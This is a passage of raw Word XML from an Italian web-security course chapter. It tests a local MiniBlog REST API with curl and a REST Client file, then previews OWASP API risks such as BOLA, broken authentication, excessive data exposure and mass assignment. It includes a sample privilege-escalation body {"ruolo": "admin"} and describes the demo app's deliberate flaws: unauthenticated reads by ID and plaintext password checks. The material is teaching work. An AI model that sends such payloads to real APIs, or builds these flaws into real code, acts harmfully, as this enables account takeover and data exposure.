          <w:t xml:space="preserve">http://127.0.0.1:5000/api/messaggi/1</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> -H "Authorization: Bearer IL-TUO-TOKEN" -i</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">HTTP/1.1 204 NO CONTENT</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Status</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">204 No Content</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, body vuoto: convenzione REST per</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">operazione riuscita, niente da restituire</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="172"/>
    <w:bookmarkStart w:id="173" w:name="step-4-testiamo-con-rest-client"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Step 4 — Testiamo con REST Client</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Ora la versione comoda. Crea in</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">corso-sicurezza/miniblog/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">un file chiamato</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">test-api.http</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">con questo contenuto:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">### Variabili di base (modifica il token dopo aver fatto login)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">@host = </w:t>
      </w:r>
      <w:hyperlink r:id="rId31">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">http://127.0.0.1:5000</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">@token = inserisci-qui-il-token-dopo-il-login</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">### 1. Lista messaggi (pubblica, no autenticazione)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">GET {{host}}/api/messaggi</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">### 2. Login (copia il token nella variabile @token sopra)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">POST {{host}}/api/login</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Content-Type: application/json</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">{</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  "username": "mario",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  "password": "mario"</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">}</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">### 3. Pubblica un messaggio</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">POST {{host}}/api/messaggi</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Content-Type: application/json</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Authorization: Bearer {{token}}</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">{</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  "testo": "Ciao da REST Client!"</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">}</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">### 4. Recupera un singolo messaggio</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">GET {{host}}/api/messaggi/1</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">### 5. Tentativo di cancellazione senza autenticazione (deve dare 401)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">DELETE {{host}}/api/messaggi/1</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">### 6. Cancellazione autenticata</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">DELETE {{host}}/api/messaggi/1</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Authorization: Bearer {{token}}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Sopra ogni</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">###</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">cliccare</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Send Request</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. La risposta apparirà in un pannello a fianco, con sintassi colorata e formattazione. Note:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1080"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">@host</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">@token</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">sono</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">variabili</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">del file, riutilizzabili come</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">{{host}}</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">{{token}}</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1080"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Per testare il flusso completo: lancia la richiesta 2 (login), copia il token dalla risposta, incollalo nella variabile</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">@token</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">in alto, poi lancia 3, 4, 6.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Il file</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">.http</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">può essere committato nel repository del progetto: chiunque clona il progetto trova tutte le chiamate di test pronte all’uso.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="173"/>
    <w:bookmarkEnd w:id="174"/>
    <w:bookmarkStart w:id="175" w:name="X7fe4ae95543baec6fdaabe4b08198f6d83431a3"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3b.12 Anteprima delle vulnerabilità tipiche delle API</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Prima di chiudere, una mappa breve delle vulnerabilità che colpiscono specificamente le API REST. Le vedremo in dettaglio nei capitoli successivi (anche per le API valgono le stesse vulnerabilità delle app web tradizionali, più alcune specifiche).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">OWASP mantiene una lista a parte chiamata</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">OWASP API Security Top 10</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(la versione più recente è del 2023). Le tre voci più importanti per il primo anno:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">1. Broken Object Level Authorization (BOLA / IDOR sulle API)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">—</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink w:anchor="ch_6" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:iCs/>
            <w:i/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">Cap. 6</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">. È la prima voce, perché è la più diffusa. Un’API che restituisce</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/api/utenti/42</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">senza verificare che il chiamante</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">sia</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">l’utente 42 (o un suo amministratore) espone tutti i dati di tutti gli utenti. Esempio nella nostra</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">api_messaggi_singolo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">di MiniBlog: chiunque, anche senza autenticazione, può recuperare qualunque messaggio per ID. Per i messaggi pubblici di una bacheca va bene; per le fatture di una banca sarebbe un disastro.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">2. Broken Authentication</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">—</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">cenni </w:t>
      </w:r>
      <w:hyperlink w:anchor="ch_7" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:iCs/>
            <w:i/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">Cap. 7</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">, JWT al secondo anno</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Token deboli, token che non scadono mai, login senza rate limiting. La nostra</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">api_login</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">di MiniBlog accetta password in chiaro confrontate direttamente con il database — vedremo nel </w:t>
      </w:r>
      <w:hyperlink w:anchor="ch_7" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">Cap. 7</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> perché è sbagliato.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">3. Excessive Data Exposure</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">—</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">trasversale</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. L’API restituisce</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">più dati</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">di quelli che il client effettivamente dovrebbe vedere, e si affida al client per</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">filtrare</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">la visualizzazione. Esempio classico: un’API</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/api/utenti/42</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">che restituisce anche l’hash della password, fidando del fatto che la app mobile non la mostri. Ma chiunque può chiamare l’API direttamente con curl.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Aggiungo una vulnerabilità specifica delle API che incontreremo:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">4. Mass Assignment</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— un caso particolare di</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">il server si fida di campi inviati dal client</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Un’API</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">PATCH /api/utenti/42</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">che accetta un body JSON e lo applica al modello senza filtrare i campi può ricevere</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">{"ruolo": "admin"}</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">e promuovere l’utente ad amministratore. È esattamente il caso eBay 2008 e GitHub 2012 del </w:t>
      </w:r>
      <w:hyperlink w:anchor="ch_1" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">Capitolo 1</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">. Vedremo come prevenirlo.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="175"/>
    <w:bookmarkStart w:id="176" w:name="b.13-riepilogo-del-capitolo"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3b.13 Riepilogo del capitolo</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1081"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Una</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">API web</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">è un’interfaccia HTTP attraverso cui un programma offre servizi ad altri programmi, restituendo dati grezzi (di solito JSON) invece che HTML.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1081"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">JSON</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">è il formato standard per i dati delle API: testo strutturato leggibile da umani e macchine.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1081"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">REST</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">è uno stile architetturale (non un protocollo) basato su risorse, URL prevedibili, uso coerente dei metodi HTTP, e statelessness lato server.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1081"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Le</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">5 regole pratiche</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">di un’API REST decente: tutto è una risorsa; URL ordinati e plurali; metodo HTTP = operazione; codice di stato = esito; JSON come formato.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1081"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">I</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">metodi HTTP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">hanno significati precisi: GET legge, POST crea, PUT/PATCH modifica, DELETE cancella.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1081"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Gli</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">status code</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">sono la fonte di verità sull’esito: 2xx successo, 4xx errore del client, 5xx errore del server. Niente</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">200 OK</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">con</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">errore: true</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">nel body.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1081"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">L’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">autenticazione delle API</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">usa di norma</w:t>
      </w:r>
      <w:r>
